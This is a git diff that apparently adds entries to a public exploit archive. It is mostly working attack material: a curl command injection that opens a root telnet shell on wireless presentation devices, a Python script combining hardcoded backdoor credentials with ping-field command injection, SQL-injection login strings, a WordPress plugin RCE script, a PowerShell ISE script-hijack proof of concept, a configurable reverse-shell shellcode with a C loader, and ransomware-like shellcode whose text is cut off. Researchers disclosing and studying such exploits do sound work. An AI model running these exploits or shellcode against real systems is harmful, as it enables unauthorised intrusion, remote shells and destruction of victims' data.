diff --git a/exploits/hardware/webapps/46786.txt b/exploits/hardware/webapps/46786.txt new file mode 100644 index 000000000..8d73a26c7 --- /dev/null +++ b/exploits/hardware/webapps/46786.txt @@ -0,0 +1,40 @@ +## +# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection +# Date: 05/01/2019 +# Exploit Author: Jacob Baines +# Tested on: Crestron AM-100 1.6.0.2 +# CVE : CVE-2019-3929 +# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k +# Advisory: https://www.tenable.com/security/research/tra-2019-20 +# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c +# Affected Vendors/Device/Firmware: +# - Crestron AM-100 1.6.0.2 +# - Crestron AM-101 2.7.0.1 +# - Barco wePresent WiPG-1000P 2.3.0.10 +# - Barco wePresent WiPG-1600W before 2.4.1.19 +# - Extron ShareLink 200/250 2.0.3.4 +# - Teq AV IT WIPS710 1.1.0.7 +# - InFocus LiteShow3 1.0.16 +# - InFocus LiteShow4 2.0.0.7 +# - Optoma WPS-Pro 1.0.0.5 +# - Blackbox HD WPS 1.0.0.5 +# - SHARP PN-L703WA 1.4.2.3 +## + +The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device: + +curl --header "Content-Type: application/x-www-form-urlencoded" \ +--request POST \ +--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \ +--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi + +Example: + +albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi +root +albinolobster@ubuntu:~$ telnet 192.168.88.250 1271 +Trying 192.168.88.250... +Connected to 192.168.88.250. +Escape character is '^]'. + +~/boa/cgi-bin # \ No newline at end of file diff --git a/exploits/linux/remote/46792.py b/exploits/linux/remote/46792.py new file mode 100755 index 000000000..17187064c --- /dev/null +++ b/exploits/linux/remote/46792.py @@ -0,0 +1,102 @@ +# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution +# Google Dork: N/A +# Date: 02/05/2019 +# Exploit Author: Paolo Serracino +# Vendor Homepage: http://www.5vtechnologies.com +# Software Link: N/A +# Version: All +# Tested on: Embedded Linux OS +# CVE : N/A +# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated +# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one. +# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account. +# A list of these accounts is hardcoded in the script. + +#/usr/bin/python +import sys +import requests + + +def check_sw(target,port): + + res = requests.get(target + ':' + port) + + if '/cgi-bin/webctrl.cgi?action=index_page' in res.text: + return True + else: + print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR" + return False + +def check_login(target,port,command): + + if not check_sw(target,port): + sys.exit() + + creds_common = [('blueangel','blueangel'), #the "backdoor" account + ('root','abnareum10'), + ('root','Admin@tbroad'), + ('root','superuser'), + ('user','user') , + ('guest','guest'), + ] + + for i in range(len(creds_common)): + postdata=[('action','login_authentication'), + ('redirect_action','sysinfo_page'), + ('login_username',creds_common[i][0]), + ('login_password',creds_common[i][1]), + ('B1','Login') + ] + + res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata) + + if 'Set-Cookie' in res.headers: + cookie = res.headers.get('Set-Cookie') + print '[+] LOGGED IN WITH CREDENTIALS ' + str(creds_common[i][0] + ' : ' + creds_common[i][1]) + execute_cmd(target,port,cookie,command) + return True + + +def execute_cmd(target,port,cookie,cmd): + + print '[+] EXECUTING COMMAND' + new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', + 'Referer': target, + 'Cookie': cookie + }) + res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers) + res_lines = res.text.splitlines() + result = [] + copy = False + + for line in res_lines: + + if 'round-trip min/avg/max' in line: + copy = True + elif '' in line: + copy = False + elif copy == True: + result.append(line) + + print('[+] COMMAND RESPONSE') + print('------------------------------------------') + + for r in result: + print r + print('------------------------------------------') + + +def main(): + + if len(sys.argv) < 4: + print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND' + sys.exit() + + target = sys.argv[1] + port = sys.argv[2] + command = sys.argv[3] + if not check_login(target,port,command): + print '[-] COULD NOT FIND VALID CREDENTIALS' + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/46788.txt b/exploits/multiple/webapps/46788.txt new file mode 100644 index 000000000..b1d5ca9f0 --- /dev/null +++ b/exploits/multiple/webapps/46788.txt @@ -0,0 +1,28 @@ +# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting +# Date: 24-04-2019 +# Exploit Author: Ramòn Janssen +# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen +# Vendor Homepage: http://zotonic.com/ +# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0 +# Version: <=0.46 +# CVE : CVE-2019-11504 + +Attack type +Remote + +Impact +Code Execution + +Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module: +- /admin/overview/ [qcat, qcustompivot, qs] +- /admin/users/ [qs] +- /admin/media/ [qcat,qcustompivot, qs] + +Example: https://[host]/admin/overview?qcustompivot="> + +Affected source code file zotonic_mod_admin: +- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl +- zotonic_mod_admin_identity\priv\templates\admin_users.tpl + +Reference(s) +http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html \ No newline at end of file diff --git a/exploits/php/webapps/46787.txt b/exploits/php/webapps/46787.txt new file mode 100644 index 000000000..52b26f4f0 --- /dev/null +++ b/exploits/php/webapps/46787.txt @@ -0,0 +1,12 @@ +# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass +# Date: 2019-05-01 +# Exploit Author: Veyselxan +# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4 + +# Tested on: Linux +https://eowynlab.cf/autobot-follow/index.php + + +username: admin' or '1'='1 + +Password: admin' or '1'='1 \ No newline at end of file diff --git a/exploits/php/webapps/46794.py b/exploits/php/webapps/46794.py new file mode 100755 index 000000000..cfded3195 --- /dev/null +++ b/exploits/php/webapps/46794.py @@ -0,0 +1,67 @@ +# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) +# Date: March, 2019 +# Researcher: Luka Sikic +# Exploit Author: hash3liZer +# Download Link: https://wordpress.org/plugins/social-warfare/ +# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM +# Github: https://github.com/hash3liZer/CVE-2019-9978 +# Version: <=3D 3.5.2 +# CVE: CVE-2019-9978 + +# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 ) +# Date: March, 2019 +# Researcher: Luka Sikic +# Exploit Author: hash3liZer +# Download Link: https://wordpress.org/plugins/social-warfare/ +# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM +# Github: https://github.com/hash3liZer/CVE-2019-9978 +# Version: <= 3.5.2 +# CVE: CVE-2019-9978 + +import sys +import requests +import re +import urlparse +import optparse + +class EXPLOIT: + + VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s" + + def __init__(self, _t, _p): + self.target = _t + self.payload = _p + + def engage(self): + uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload ) + r = requests.get( uri ) + if r.status_code == 500: + print "[*] Received Response From Server!" + rr = r.text + obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" )) + if obj: + resp = obj.groups()[0] + if resp: + print "[<] Received: " + print resp.replace( "lnbreak", "\n" ) + else: + sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") + else: + sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") + else: + sys.exit( "[~] Unexpected Status Received!" ) + +def main(): + parser = optparse.OptionParser( ) + + parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" ) + parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." ) + + (options, args) = parser.parse_args() + + print "[>] Sending Payload to System!" + exploit = EXPLOIT( options.target, options.payload ) + exploit.engage() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/dos/46793.txt b/exploits/windows/dos/46793.txt new file mode 100644 index 000000000..f86cdc980 --- /dev/null +++ b/exploits/windows/dos/46793.txt @@ -0,0 +1,32 @@ +#Vendor: Solarwinds +#Site Vendor: https://www.dameware.com/ +#Product: Dameware Mini Remote Control +#Version: 10.0 x64 +#Platform: Windows +#Tested on: Windows 7 SP1 x64 +#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. +#The buffer size passed in on the machine name parameter is not checked +#Vector: pass buffer to the machine host name parameter + +#Author: Dino Barlattani dinbar78@gmail.com +#Link: http://www.binaryworld.it + +#CVE ID: CVE-2019-9017 + +#POC in VB Script + +option explicit +dim fold,exe,buf,i,wsh,fso,result +exe = "DWRCC.exe" +fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64 +#1\" +for i = 0 to 300 + buf = buf & "A" +next +set wsh = createobject("wscript.shell") +set fso = createobject("scripting.filesystemobject") +if fso.folderexists(fold) then + fold = fold & exe + fold = chr(34) & fold & chr(34) + result = wsh.run(fold & " -c: -h: -m:" & buf,0,true) +end if \ No newline at end of file diff --git a/exploits/windows/local/46790.txt b/exploits/windows/local/46790.txt new file mode 100644 index 000000000..84f4ef228 --- /dev/null +++ b/exploits/windows/local/46790.txt @@ -0,0 +1,155 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt +[+] ISR: ApparitionSec +[+] Zero Day Initiative Program + + +[Vendor] +www.microsoft.com + + +[Product] +Windows PowerShell ISE + +The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. +In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface. + + +[Vulnerability Type] +Filename Parsing Flaw Remote Code Execution 0day + + +[References] +ZDI-CAN-8005 + + +[Security Issue] +Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain +array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename +and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of +PowerShell ISE allowing potential unexpected remote code execution. + +In PowerShell brackets are used to access array elements. + +PS C:\> $a=1..10 +PS C:\> $a[4] +5 + +However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. +That file must contain a single matching char value which is also found in our specially crafted filename. + +Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a +file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L". + +Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. +PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application. + +These chars also get the job done: +"$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1 + +[Hello].ps1 will execute this instead =====> h.ps1 + +Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to +another PS file named -.ps1 and seems to treat it sort of like a meta-character. + +[pw3d].ps1 <===== expected to execute + +3.ps1 <===== actually executed + +This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code +in ISE that is expected to run. However, when the user debugs the script a different script gets executed. +Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss. + +User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. +Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and +yet ... still they get PWNED!. + +Tested successfully on Win7/10 + +Long live user interaction! lol... + + +[POC Video URL] +https://www.youtube.com/watch?v=T2I_-iUPaFw + + +[Exploit/POC] +After opening PS files in ISE, set the execution policy so can test without issues. +set-executionpolicy unrestricted -force + +PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd. + +set-executionpolicy unrestricted -force process +Choose 'R' to run once. + +Below Python script will create two .ps1 files to demonstrate the vulnerable condition. +Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... + +BAM! other PS script executes!. + + +#PowerShell ISE 0day Xploit +#ZDI-CAN-8005 +#ZDI CVSS: 7.0 +#hyp3rlinx +#ApparitionSec + + +fname1="[HelloWorldTutoria1].ps1" #Expected code to run is 'HelloWorld!' +fname2="1.ps1" #Actual code executed is calc.exe for Poc +evil_code="start calc.exe" #Edit to suit your needs. +c=0 +payload1='Write-Output "Hello World!"' +payload2=evil_code+"\n"+'Write-Output "Hello World!"' + +def mk_ps_hijack_script(): + global c + c+=1 + f=open(globals()["fname"+str(c)],"wb") + f.write(globals()["payload"+str(c)]) + f.close() + if c<2: + mk_ps_hijack_script() + + +if __name__=="__main__": + mk_ps_hijack_script() + print "PowerShell ISE Xploit 0day Files Created!" + print "Discovery by hyp3rlinx" + print "ZDI-CAN-8005" + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +ZDI Case opened : 2019-02-06 +Case officially contracted to ZDI : 2019-02-20 + +Vendor Disclosure : 2019-03-01 +submitted to the vendor as ZDI-CAN-8005. + +April 25, 2019 : MSRC response (as per ZDI): "we've determined that this doesn't meet the bar for servicing via a security update. +we have opened a bug with the PowerShell team, and this is something they may address in a future release as a form of defense-in-depth." + +ZDI also indicated they too will close the case. +May 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b12346902..286762240 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6407,6 +6407,7 @@ id,file,description,date,author,type,platform,port 46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux, 46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows, 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux, +46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10450,6 +10451,7 @@ id,file,description,date,author,type,platform,port 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows, 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows, +46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17375,6 +17377,7 @@ id,file,description,date,author,type,platform,port 46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows, 46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php, 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000 +46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41217,3 +41220,7 @@ id,file,description,date,author,type,platform,port 46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux, 46777,exploits/php/webapps/46777.txt,"Agent Tesla Botnet - Information Disclosure",2019-04-30,n4pst3r,webapps,php, 46780,exploits/windows/webapps/46780.py,"Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution",2019-04-30,"Avinash Kumar Thapa",webapps,windows, +46786,exploits/hardware/webapps/46786.txt,"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection",2019-05-03,"Jacob Baines",webapps,hardware, +46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php, +46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple, +46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 498f78e76..2082791b3 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -959,3 +959,5 @@ id,file,description,date,author,type,platform 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86 46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator +46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86 +46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86 diff --git a/shellcodes/linux_x86/46789.txt b/shellcodes/linux_x86/46789.txt new file mode 100644 index 000000000..1d4823549 --- /dev/null +++ b/shellcodes/linux_x86/46789.txt @@ -0,0 +1,242 @@ +# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper +# Google Dork: NA +# Date: 2019-05-01 +# Exploit Author: Dave Sully +# Vendor Homepage: +# Software Link: NA +# Version: NA +# Tested on: Ubuntu 16.04 +# CVE : NA + +####################################################################### +####################################################################### + +# This is the raw assembly + +####################################################################### +####################################################################### + +; Filename: reverse_shell.nasm +; Author: Dave Sully +; Website: http://suls.co.uk +; Purpose: Reverse shell in x86 assembly + +global _start + +section .text +_start: + + ; Clear everthing we are using + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + xor esi, esi + xor edi, edi + + ; Define structure for socket + ; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here (127.0.0.1) + ; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes + ; Easiest way around this is to XOR the value with 0xffffffff + mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff + xor edi, 0xffffffff + push edi + push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 + push word 0x2 ; push 2 to the stack (AF-INET) + + ; Create socket + ; s = socket(AF_INET, SOCK_STREAM, 0) + mov ax, 0x167 ; Syscall 359 (socket) + mov bl, 0x2 ; AF-INET (2) + mov cl, 0x1 ; Sock stream (1) + ; dl should already be zero + int 0x80 ; call system interupt to create socket + xchg esi, eax ; socket file descriptor now stored in esi + + ; Connect socket + ; connect(s, (struct sockaddr *)&addr, sizeof(addr)); + mov ax, 0x16a ; Syscall 362 connect + mov ebx, esi ; Move socket file descriptor into ebx + mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it + mov dl, 0x10 ; Size of structure (16) + int 0x80 ; call system interupt to create connect + + ; Dup input output and error file descriptors + ; dup2(s, 0); // Dup2 sycall = 63 + xor eax, eax ; Clear eax + mov ebx, esi ; move socket id to ebx + xor ecx, ecx ; Clear ecx + mov cl, 0x2 ; set ecx to 2 +loop: + mov al, 0x3f ; syscall 63 + int 0x80 ; call dup 2 + dec ecx ; decrease ecx by 1 + jns loop ; jump if not signed back to loop, this should cycle 2,1,0 + + ; Execute Shell + ; execve("/bin/sh",0 ,0); // Execve syscall = 11 + ; (const char *filename, char *const argv[], char *const envp[]); + xor eax,eax ; null eax + mov al, 0xb ; syscall 11 into eax + xor ebx, ebx ; zero ebx + push ebx ; push a null string to the stack to terminate our string + push 0x68732f2f ; hs// + push 0x6e69622f ; nib/ + mov ebx, esp ; point ebx at the stack + xor ecx, ecx ; clear ecx and edx as they are used in the syscall + xor edx, edx + int 0x80 + +section .data + +####################################################################### +####################################################################### + +### Compile and link as follows + +nasm -f elf32 -o reverse_shell.o reverse_shell.nasm +gcc -o reverse_shell reverse_shell.o + + +####################################################################### +####################################################################### + +### To configure IP and port use the following python3 wrapper script + +####################################################################### +####################################################################### + + +#!/usr/bin/env python3 +# File: wrapper.py +# Author: Dave Sully +# Reverse shell wrapper in python3 +# Usage: python3 wrapper.py 192.168.1.1 5000 + +import argparse +import socket +from struct import unpack + +print("\n*****************************************") +print("***** Reverse shell wrapper script ******") +print("*****************************************") + +# Grab command line args (ip and port) +parser = argparse.ArgumentParser() +parser.add_argument("ip") +parser.add_argument("port") +args = parser.parse_args() +# check port is in a valid range +if ((int(args.port) > 65535) or (int(args.port) < 256)): + print("\nPort number must be between 256 and 65535\n") + exit() + +# Xor Function +def xor_strings(str1,str2): + result = int(str1,16) ^ int(str2,16) + return '{:x}'.format(result) + +# Process IP address +print("\nIP address: "+ args.ip) +# Convert IP to Hex +hexip = socket.inet_aton(args.ip).hex() +print("Hex IP Address: "+hexip) +# Reverse the hex String +revhexip = hexip[6:8] +revhexip = revhexip + hexip[4:6] +revhexip = revhexip + hexip[2:4] +revhexip = revhexip + hexip[0:2] +# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes +xored_ip = xor_strings(revhexip,"FFFFFFFF") +print("XORed reverse hex IP Address: "+ xored_ip) + +# Process Port +print("\nPort: "+args.port) +# Convert Port to hex +hexport = hex(int(args.port)).replace('0x','') +if len(hexport)<4: + hexport = '0'+hexport +print("Hex Port: "+hexport) +revhexport = hexport[2:4]+ hexport[0:2] +print("Reverse Hex Port: "+revhexport) + +# Check for null bytes +if (xored_ip[0:2]=="00" or + xored_ip[2:4]=="00" or + xored_ip[4:6]=="00" or + xored_ip[6:8]=="00" or + revhexport[0:2]=="00" or + revhexport[2:4]=="00"): + print("\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,") + print("shellcode may not work !\n") + +# Construct Shellcode +shellcode= \ +"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf" + \ + "\\x"+ xored_ip[6:8] + \ + "\\x"+ xored_ip[4:6] + \ + "\\x"+ xored_ip[2:4] + \ + "\\x"+ xored_ip[0:2] + \ +"\\x83\\xf7\\xff\\x57\\x66\\x68" + \ + "\\x"+ revhexport[2:4] + \ + "\\x"+ revhexport[0:2] + \ +"\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66" + \ +"\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3" + \ +"\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b" + \ +"\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3" + \ +"\\x31\\xc9\\x31\\xd2\\xcd\\x80" +# Output Shellcode +print("\nShellcode (Length 91 Bytes): \n") +print(shellcode+"\n") + +####################################################################### +####################################################################### + +# Example output + +***************************************** +***** Reverse shell wrapper script ****** +***************************************** + +IP address: 127.0.0.1 +Hex IP Address: 7f000001 +XORed reverse hex IP Address: feffff80 + +Port: 8080 +Hex Port: 1f90 +Reverse Hex Port: 901f + +Shellcode (Length 91 Bytes): + +\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80 + + +####################################################################### +####################################################################### + +# To compile shellcode from the wrapper script use the following C program +# Replacing the shellcode with the wrapper script shellcode output + +####################################################################### +####################################################################### + +// Filename: shellcode.c +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} + +####################################################################### +####################################################################### + +# Compile with + +gcc -fno-stack-protector -z execstack -o shellcode shellcode.c \ No newline at end of file diff --git a/shellcodes/linux_x86/46791.c b/shellcodes/linux_x86/46791.c new file mode 100644 index 000000000..9a7dad830 --- /dev/null +++ b/shellcodes/linux_x86/46791.c @@ -0,0 +1,67 @@ +# Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes) +# Google Dork: None +# Date: 02.05.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 185 +------------------------------[Description]--------------------------------- + +This shellcode encrypts the specified file aith aes256cbc and a 32byte random key. +After encryption the key is dropped. + +replace test.txt and .test.txt with any file. + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + jmp short _cmd + +_exec: + pop ecx + mov edi, ecx + xor ecx, ecx + push eax + push 0x68732f6e + push 0x69622f2f + mov ebx, esp + push eax + push word 0x632d + mov esi, esp + push eax + push edi + push esi + push ebx + mov ecx, esp + mov al, 11 + int 0x80 + +_cmd: + call _exec + ;replace test.txt with any file + msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl 